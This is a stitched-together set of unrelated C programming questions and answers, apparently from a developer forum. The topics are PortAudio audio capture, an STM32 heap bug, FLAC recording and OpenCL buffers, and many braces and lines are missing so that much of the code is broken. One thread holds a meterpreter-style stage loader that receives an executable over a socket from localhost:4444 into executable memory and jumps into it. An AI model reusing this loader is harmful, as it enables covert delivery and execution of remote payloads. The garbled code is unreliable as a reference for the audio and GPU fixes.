I am using PortAudio to implement a real-time audio processing.
My primary task is to acquire data from mic continuously and provide 100 samples for processing (each FRAME = 100 samples at a time) to some other processing thread.
Here is my callback collecting 100 samples each time on a continuous basis -
static int paStreamCallback( const void* input, void* output,
unsigned long samplesPerFrame,
const PaStreamCallbackTimeInfo* timeInfo,
PaStreamCallbackFlags statusFlags,
void* userData ) {
paTestData *data = (paTestData*) userData;
const SAMPLE *readPtr = (const SAMPLE*)input; // Casting input read to valid input type SAMPLE (float)
unsigned long totalSamples = TOTAL_NUM_OF_SAMPLES ; // totalSamples = 100 here
(void) output;
(void) timeInfo;
(void) statusFlags;
static int count = 1;
if(data->sampleIndex < count * samplesPerFrame){
data->recordedSample[data->sampleIndex] = *readPtr;
else if(data->sampleIndex == count * samplesPerFrame){
finished = paContinue;
return finished;
My `main function -
int main(void){
// Some Code here
data.sampleIndex = 0;
data.frameIndex = 1;
numBytes = TOTAL_NUM_OF_SAMPLES * sizeof(SAMPLE);
data.recordedSample = (SAMPLE*)malloc(numBytes);
for(i=0; i < TOTAL_NUM_OF_SAMPLES; i++)
data.recordedSample[i] = 0;
// Open Stream Initialization
err = Pa_StartStream(stream);
/* Recording audio here..Speak into the MIC */
while((err = Pa_IsStreamActive(stream)) == 1)
if(err < 0)
goto done;
err = Pa_CloseStream(stream);
// Some more code here
Sending each Frame of 100 samples to processSampleFrame.
void processSampleFrame(SAMPLE *singleFrame){
// Free buffer of this frame
// Processing sample frame here
The challenge is that I need to implement a way in which the time processSampleFrame is processing the samples, my callBack should be active and keep acquiring the next Frame of 100 samples and (may be more depending upon the processing time of processSampleFrame).
Also the buffer should able to free itself of the frame so sooner it has passed it to processSampleFrame.
EDIT 2 :
I tried implementing with PaUtilRingBuffer that PortAudio provides. Here is my callback.
printf("Inside callback\n");
paTestData *data = (paTestData*) userData;
ring_buffer_size_t elementsWritable = PaUtil_GetRingBufferWriteAvailable(&data->ringBuffer);
ring_buffer_size_t elementsToWrite = rbs_min(elementsWritable, (ring_buffer_size_t)(samplesPerFrame * numChannels));
const SAMPLE *readPtr = (const SAMPLE*)input;
printf("Sample ReadPtr = %.8f\n", *readPtr);
(void) output; // Preventing unused variable warnings
(void) timeInfo;
(void) statusFlags;
data->frameIndex += PaUtil_WriteRingBuffer(&data->ringBuffer, readPtr, elementsToWrite);
return paContinue;
And main :
int main(void){
paTestData data; // Object of paTestData structure
data.frameIndex = 1;
data.ringBufferData = (SAMPLE*)PaUtil_AllocateMemory(numBytes);
if(PaUtil_InitializeRingBuffer(&data.ringBuffer, sizeof(SAMPLE), ELEMENTS_TO_WRITE, data.ringBufferData) < 0){
printf("Failed to initialise Ring Buffer.\n");
goto done;
err = Pa_StartStream(stream);
/* Recording audio here..Speak into the MIC */
printf("\nRecording samples\n");
while((err = Pa_IsStreamActive(stream)) == 1)
if(err < 0)
goto done;
err = Pa_CloseStream(stream);
// Error Handling here
PaTestData Structure :
typedef struct{
SAMPLE *ringBufferData;
PaUtilRingBuffer ringBuffer;
unsigned int frameIndex;
I am facing the same issue of seg-fault after successful acquisition for the allocated space because of not being able to use any free in the callback as suggested by PortAudio documentation.
Where can I free the buffer of the allocated frame given to the processing thread. May be a method of obtaining a thread-synchronization can be really useful here. Your help is appreciated.
Example code of processing audio input:
#define FRAME_SIZE 1024
typedef struct {
int read, write;
float vol;
} paData;
static int paStreamCallback(const void* input, void* output,
unsigned long samplesPerFrame,
const PaStreamCallbackTimeInfo* timeInfo,
PaStreamCallbackFlags statusFlags,
void* userData) {
paData *data = (paData *)userData;
// Write input buffer to our buffer: (memcpy function is fine, just a for loop of writing data
memcpy(&buffer[write], input, samplesPerFrame); // Assuming samplesPerFrame = FRAME_SIZE
// Increment write/wraparound
// dummy algorithm for processing blocks:
// Write output
float *dummy_buffer = &buffer[read]; // just for easy increment
for (int i = 0; i < samplesPerFrame; i++) {
// Mix audio input and processed input; 50% mix
output[i] = input[i] * 0.5 + dummy_buffer[i] * 0.5;
// Increment read/wraparound
return paContinue;
int main(void) {
// Initialize code here; any memory allocation needs to be done here! default buffers to 0 (silence)
// initialize paData too; write = 0, read = 3072
// read is 3072 because I'm thinking about this like a delay system.
Take this with a grain of salt; Obviously better ways of doing this but it can be used as a starting point.
I wanted to retrieve an exe file from a socket and run it right from the buffer in C . I've found this little loader in github which was written to load meterpreter:
As far as i know it works like this:
it gets the size of the exe file and allocates a buffer with the size + 5.
then it downloads the file using a socket and saves it in the buffer.
and casts the buffer to a pointer to function and simply calls the function.
That's what is does from a high abstraction. Though I don't exactly know what buffer[0] = 0xBF; actually does.
I've tried to change the code to run my exe file like this (the rest of functions are exactly the same as the original code):
//receive the agent data
int recv_all(SOCKET my_socket, void* buffer, int len) {
int tret = 0;
int nret = 0;
char* startb = (char *) buffer;
while (tret < len) {
nret = recv(my_socket, (char *)startb, len - tret, 0);
if (nret == SOCKET_ERROR)
punt(my_socket, "Could not receive data");
startb += nret;
tret += nret;
return tret; // length of received Data
int main(int argc, char *argv[]){
char host[] = "localhost";
int port = 4444;
int count;
ULONG32 size = 624128; //size of my file hard coded
char *buffer;
void (* function)();
SOCKET my_socket;
my_socket = wsconnect(host, port);
buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (buffer == NULL){
punt(my_socket, "could not allocate buffer");
buffer[0] = 0xBF;
memcpy(buffer + 1, &my_socket, 4);
count = recv_all(my_socket, buffer + 5, size);
function = (void (*)())buffer;
return 0;
As you can see I've just hard coded the size of my file in bytes.
Here is how I send the file:
f = open("my_file.exe", "rb")
l = f.read(1024)
l = f.read(1024)
But after running the C code I get "Access violation":
Unhandled exception at 0x0069000C in laoder.exe: 0xC0000005: Access violation writing location 0x00D20000.
I'd appreciate any help on why this happens and what I am doing wrong.
EDIT: What I thought was a bug-correction was nothing but a random fix. I was forgetting to free up heap memory correctly. See the actual code and explanation at the bottom (I'm not sure if I should have edited the whole question).
I haved fixed a bug, but do not understand what it's causing it.
If I use a helper pointer to access the element of a list in the heap, and modify its contents, everything's fine. However, if I directly modify the contents of the element using a function that returns that pointer, then this data gets corrupted at a later stage when allocating more memory.
The error only appears when the code is run in a loop, on the 6th cycle.
Code does not work
// numEvents gets corrupted after some cycles
lstEvent_NewList(&lstEvent, 1, &err); // creates a list of typeEvent in heap
lstEvent_FirstNode(&lstEvent)->numEvents = events; // access first element of list directly
typeCommand * p = 0;
p = (typeCommand *) malloc(sizeof(typeCommand)); // do some more allocations
lstField_NewList(&p->lstFields, 5, &err); // THIS LINE CAUSES CORRUPTION IN numEvents
Code does work
typeEvent * pEvent; // use an auxiliar to iterate through the list
lstEvent_NewList(&lstEvent, 1, &err);
pEvent = lstEvent_FirstNode(&lstEvent);
pEvent->numEvents = events;
typeCommand * p = 0;
p = (typeCommand *) malloc(sizeof(typeCommand)); // do some more allocations
lstField_NewList(&p->lstFields, 5, &err); // all is good
So, basically if I use an auxiliar to get the first element of the list nothing happens. However, if I use the function to directly access the first element, it breaks later on in the program.
Structure and function definitions:
typeEvent * lstEvent_FirstNode (LSTEvent *lst)
return lst->ls;
void lstEvent_NewList (LSTEvent * lst, uint16_t size, uint8_t * err)
typeEvent* ret = 0;
ret = (typeEvent*)malloc(sizeof(typeEvent)*size);
if (ret == 0)
*err = E_RUN_OUT_OF_MEM;
lst->cn = 0;
*err = 0;
lst->ls = ret;
lst->cn = size;
void lstField_NewList (LSTField * lst, uint16_t size, uint8_t * err)
typeField* ret = 0;
ret = (typeField*)malloc(sizeof(typeField)*size);
if (ret == 0)
*err = E_RUN_OUT_OF_MEM;
lst->cn = 0;
*err = 0;
lst->ls = ret;
lst->cn = size;
void lstEvent_ClearList (LSTEvent * lst)
lst->ls = 0;
lst->cn = 0;
void lstField_ClearList (LSTField * lst)
lst->ls = 0;
lst->cn = 0;
struct DM_Field{
__packed uint8_t value;
typedef struct DM_Field typeField;
typedef struct LSTField {
__packed uint16_t cn; // Count, number of elements in array
uint8_t * ls; // Array
} LSTField;
struct DM_Command{
// some data
LSTField lstFields;
typedef struct DM_Command typeCommand;
Platform: STM32L1XX.
EDIT: This code resembles closer the reality.
Code does not work
typeCommand * p = 0;
for (uint16_t i=0; i<1000; i++)
// numEvents gets corrupted after some cycles
lstEvent_NewList(&lstEvent, 1, &err); // creates a list of typeEvent in heap
lstEvent_FirstNode(&lstEvent)->numEvents = events; // access first element of list directly
p = (typeCommand *) malloc(sizeof(typeCommand)); // do some more allocations
lstField_NewList(&p->lstFields, 5, &err); // THIS LINE (was thought to be causing) CORRUPTION IN numEvents
p = 0;
Code does work
typeCommand * p = 0;
typeEvent * pEvent; // use an auxiliar to iterate through the list
for (uint16_t i=0; i<1000; i++)
lstEvent_NewList(&lstEvent, 1, &err);
pEvent = lstEvent_FirstNode(&lstEvent);
pEvent->numEvents = events;
p = (typeCommand *) malloc(sizeof(typeCommand)); // do some more allocations
lstField_NewList(&p->lstFields, 5, &err); // all is good
free(p); // freeing properly now
p = 0;
Running my program, I appear to not be writing the correct amount of frames according to the index.
$ ./test
Now recording!! Please speak into the microphone.
index = 0
Writing to: test.flac
#include <stdint.h>
#include <string.h>
typedef struct
uint32_t duration;
uint16_t format_type;
uint16_t number_of_channels;
uint32_t sample_rate;
uint32_t frameIndex; /* Index into sample array. */
uint32_t maxFrameIndex;
char* recordedSamples;
} AudioData;
int recordFLAC(AudioData* data, const char *fileName);
AudioData* initAudioData(uint32_t sample_rate, uint16_t channels, uint32_t duration);
#include <stdio.h>
#include <stdlib.h>
#include <portaudio.h>
#include <sndfile.h>
#include "audio.h"
AudioData* initAudioData(uint32_t sample_rate, uint16_t channels, uint32_t duration)
AudioData* data = malloc(sizeof(*data));
if (!data) return NULL;
data->duration = duration;
data->format_type = 1;
data->number_of_channels = channels;
data->sample_rate = sample_rate;
data->frameIndex = 0;
data->maxFrameIndex = sample_rate * duration;
data->recordedSamples = malloc(sizeof(data->maxFrameIndex));
if(!data->maxFrameIndex) return NULL;
return data;
static int recordCallback(const void *inputBuffer, void *outputBuffer, unsigned long frameCount, const PaStreamCallbackTimeInfo* timeInfo, PaStreamCallbackFlags statusFlags, void *userData)
AudioData* data = (AudioData*)userData;
const char* buffer_ptr = (const char*)inputBuffer;
char* index_ptr = &data->recordedSamples[data->frameIndex];
(void) outputBuffer;
(void) timeInfo;
(void) statusFlags;
long framesToCalc;
long i;
int finished;
unsigned long framesLeft = data->maxFrameIndex - data->frameIndex;
if(framesLeft < frameCount){
framesToCalc = framesLeft;
finished = paComplete;
framesToCalc = frameCount;
finished = paContinue;
for(i = 0; i < framesToCalc; i++){
*index_ptr++ = 0;
for(i = 0; i < framesToCalc; i++){
*index_ptr++ = *buffer_ptr++;
data->frameIndex += framesToCalc;
return finished;
int recordFLAC(AudioData* data, const char *fileName)
PaStreamParameters inputParameters;
PaStream* stream;
int err = 0;
int totalFrames = data->maxFrameIndex;
int numSamples;
int numBytes;
char max, val;
double average;
numSamples = totalFrames * data->number_of_channels;
numBytes = numSamples;
data->recordedSamples = malloc(numBytes);
printf("Could not allocate record array.\n");
goto done;
for(int i = 0; i < numSamples; i++) data->recordedSamples[i] = 0;
if((err = Pa_Initialize())) goto done;
inputParameters.device = Pa_GetDefaultInputDevice(); /* default input device */
if (inputParameters.device == paNoDevice) {
fprintf(stderr,"Error: No default input device.\n");
goto done;
inputParameters.channelCount = data->number_of_channels; /* stereo input */
inputParameters.sampleFormat = data->format_type;
inputParameters.suggestedLatency = Pa_GetDeviceInfo(inputParameters.device)->defaultLowInputLatency;
inputParameters.hostApiSpecificStreamInfo = NULL;
/* Record some audio. -------------------------------------------- */
err = Pa_OpenStream(&stream, &inputParameters, NULL, data->sample_rate, paFramesPerBufferUnspecified, paClipOff, recordCallback, &data);
if(err) goto done;
if((err = Pa_StartStream(stream))) goto done;
puts("Now recording!! Please speak into the microphone.");
while((err = Pa_IsStreamActive(stream)) == 1)
printf("index = %d\n", data->frameIndex);
if( err < 0 ) goto done;
err = Pa_CloseStream(stream);
if(err) goto done;
/* Measure maximum peak amplitude. */
max = 0;
average = 0.0;
for(int i = 0; i < numSamples; i++)
val = data->recordedSamples[i];
val = abs(val);
if( val > max )
max = val;
average += val;
average /= (double)numSamples;
fprintf(stderr, "An error occured while using the portaudio stream\n");
fprintf(stderr, "Error number: %d\n", err);
fprintf(stderr, "Error message: %s\n", Pa_GetErrorText(err));
err = 1; /* Always return 0 or 1, but no other return codes. */
SF_INFO sfinfo;
sfinfo.channels = 1;
sfinfo.samplerate = data->sample_rate;
sfinfo.format = SF_FORMAT_FLAC | SF_FORMAT_PCM_16;
// open to file
printf("Writing to: %s\n", fileName);
SNDFILE * outfile = sf_open(fileName, SFM_WRITE, &sfinfo);
if (!outfile) return -1;
// prepare a 3 second long buffer (sine wave)
const int size = data->sample_rate * 3;
// write the entire buffer to the file
sf_write_raw(outfile, data->recordedSamples, size);
// force write to disk
// don't forget to close the file
return err;
I'm not quite sure where I am going wrong, I know I need to be writing more frames. Any suggestions?
There seems to be something wrong with your assumptions about the sample format. In the callback you are using char * (single bytes) for the sample format, but in your libsndfile call you're opening a 16 bit file with SF_FORMAT_PCM_16.
This is not so good:
data->format_type = 1;
I recommend using one of the symbolic constants in the PortAudio library for sample formatting. Maybe you want a 16 bit one? And if so, you want to be using short* not char* in the PA callback.
Finally, if your channel count is not 1, the copy loops are incorrect:
for(i = 0; i < framesToCalc; i++){
*index_ptr++ = 0;
A "frame" contains data for all channels, so for example, if it's a stereo input your iteration needs to deal with both left and right channels like this:
for(i = 0; i < framesToCalc; i++){
*index_ptr++ = 0; // left
*index_ptr++ = 0; // right
Same for the other loops.
I currently have some data that I would like to pass to my GPU and the multiply it by 2.
I have created a struct which can be seen here:
struct GPUPatternData
cl_int nInput,nOutput,patternCount, offest;
cl_float* patterns;
This struct should contain an array of floats. The array of floats I will not know untill run time as it is specified by the user.
The host code:
typedef struct GPUPatternDataContatiner
int nodeInput,nodeOutput,patternCount, offest;
float* patterns;
} GPUPatternData;
__kernel void patternDataAddition(__global GPUPatternData* gpd,__global GPUPatternData* output)
int index = get_global_id(0);
if(index < gpd->patternCount)
output.patterns[index] = gpd.patterns[index]*2;
Here is the Host code:
GPUPattern::GPUPatternData gpd;
gpd.nodeInput = ptSet->getInputCount();
gpd.nodeOutput = ptSet->getOutputCount();
gpd.offest = gpd.nodeInput+gpd.nodeOutput;
gpd.patternCount = ptSet->getCount();
gpd.patterns = new cl_float [gpd.patternCount*gpd.offest];
GPUPattern::GPUPatternData gridC;
gridC.nodeInput = ptSet->getInputCount();
gridC.nodeOutput = ptSet->getOutputCount();
gridC.offest = gpd.nodeInput+gpd.nodeOutput;
gridC.patternCount = ptSet->getCount();
gridC.patterns = new cl_float [gpd.patternCount*gpd.offest];
All the data is initialized then initialized with values and then passed to the GPU
int elements = gpd.patternCount;
size_t ofsdf = sizeof(gridC);
size_t dataSize = sizeof(GPUPattern::GPUPatternData)+ (sizeof(cl_float)*elements);
cl_mem bufferA = clCreateBuffer(gpu.context,CL_MEM_READ_ONLY,dataSize,NULL,&err);
//Copy the buffer to the device
err = clEnqueueWriteBuffer(queue,bufferA,CL_TRUE,0,dataSize,(void*)&gpd,0,NULL,NULL);
//This buffer is being written to only
cl_mem bufferC = clCreateBuffer(gpu.context,CL_MEM_WRITE_ONLY,dataSize,NULL,&err);
err = clEnqueueWriteBuffer(queue,bufferC,CL_TRUE,0,dataSize,(void*)&gridC,0,NULL,NULL);
Everything is built which I check just watching the error which stays at 0
cl_program program = clCreateProgramWithSource(gpu.context,1, (const char**) &kernelSource,NULL,&err);
////Build program
err = clBuildProgram(program, 0, NULL, NULL, NULL, NULL);
char build[2048];
clGetProgramBuildInfo(program, gpu.device, CL_PROGRAM_BUILD_LOG, 2048, build, NULL);
////Create kernal
cl_kernel kernal = clCreateKernel(program, "patternDataAddition",&err);
////Set kernal arguments
err = clSetKernelArg(kernal, 0, sizeof(cl_mem), &bufferA);
err |= clSetKernelArg(kernal, 1, sizeof(cl_mem), &bufferC);
It is then kicked off
size_t globalWorkSize = 1024;
size_t localWorkSize = 512;
err = clEnqueueNDRangeKernel(queue, kernal, 1, NULL, &globalWorkSize, &localWorkSize, 0, NULL, NULL);
Its at this point it all goes wrong
err = clEnqueueReadBuffer(queue, bufferC, CL_TRUE, 0, dataSize, &gridC, 0, NULL, NULL);
The error in this case is -5 (CL_OUT_OF_RESOURCES).
Also if I change the line:
err = clEnqueueReadBuffer(queue, bufferC, CL_TRUE, 0, dataSize, &gridC, 0, NULL,
err = clEnqueueReadBuffer(queue, bufferC, CL_TRUE, 0, dataSize*1000, &gridC, 0, NULL, NULL);
I get the error -30 (CL_INVALID_VALUE).
So my question is why am i getting the errors I am when reading back the buffer. Also I am not sure if I am unable to use a pointer to my float array as could this be giving me the wrong sizeof() used for datasize which gives me the wrong buffer size.
You cannot pass a struct that contains pointers into OpenCL
http://www.khronos.org/registry/cl/specs/opencl-1.2.pdf (Section 6.9)
You can either correct as Eric Bainville pointed out or if you are not very restrict on memory you can do something like
struct GPUPatternData
cl_int nInput,nOutput,patternCount, offest;
cl_float patterns[MAX_SIZE];
EDIT: OK if memory is an issue. Since you only use the patterns and patternCount you can copy the patterns from the struct and pass them to the kernel separately.
struct GPUPatternData
cl_int nInput,nOutput,patternCount, offest;
cl_float patterns*;
copy patterns to GPU from gpd and allocate space for patterns in gridC on GPU.
You can pass the buffers separately
__kernel void patternDataAddition(int gpd_patternCount,
__global const float * gpd_Patterns,
__global float * gridC_Patterns) {
int index = get_global_id(0);
if(index < gpd_patternCount)
gridC_Patterns[index] = gpd_Patterns[index]*2;
when you come back from the kernel copy the data back to gridC.patterns directly
One more :
You don't have to change your CPU struct. It stays the same. However this part
size_t dataSize = sizeof(GPUPattern::GPUPatternData)+ (sizeof(cl_float)*elements);
cl_mem bufferA = clCreateBuffer(gpu.context,CL_MEM_READ_ONLY,dataSize,NULL,&err);
//Copy the buffer to the device
err = clEnqueueWriteBuffer(queue,bufferA,CL_TRUE,0,dataSize,(void*)&gpd,0,NULL,NULL);
should be changed to something like
size_t dataSize = (sizeof(cl_float)*elements); // HERE
float* gpd_dataPointer = gpd.patterns; // HERE
cl_mem bufferA = clCreateBuffer(gpu.context,CL_MEM_READ_ONLY,dataSize,NULL,&err);
// Now use the gpd_dataPointer
err = clEnqueueWriteBuffer(queue,bufferA,CL_TRUE,0,dataSize,(void*)&(gpd_dataPointer),0,NULL,NULL);
Same thing goes for the gridC
And when you copy back, copy it to gridC_dataPointer AKA gridC.dataPointer
And then continue using the struct as if nothing happened.
The problem is probably with the pointer inside your struct.
In this case, I would suggest to pass nInput,nOutput,patternCount,offset as kernel args, and the patterns as a buffer of float:
__kernel void patternDataAddition(int nInput,int nOutput,
int patternCount,int offset,
__global const float * inPatterns,
__global float * outPatterns)
I know that it is not actual now, but i passed this problem in other way:
Your code for allocation memory for struct with data stay same, but struct should bu changed to
typedef struct GPUPatternDataContatiner
int nodeInput, nodeOutput, patternCount, offest;
float patterns[0];
} GPUPatternData;
Using this "feature" i have created vectors for OpenCL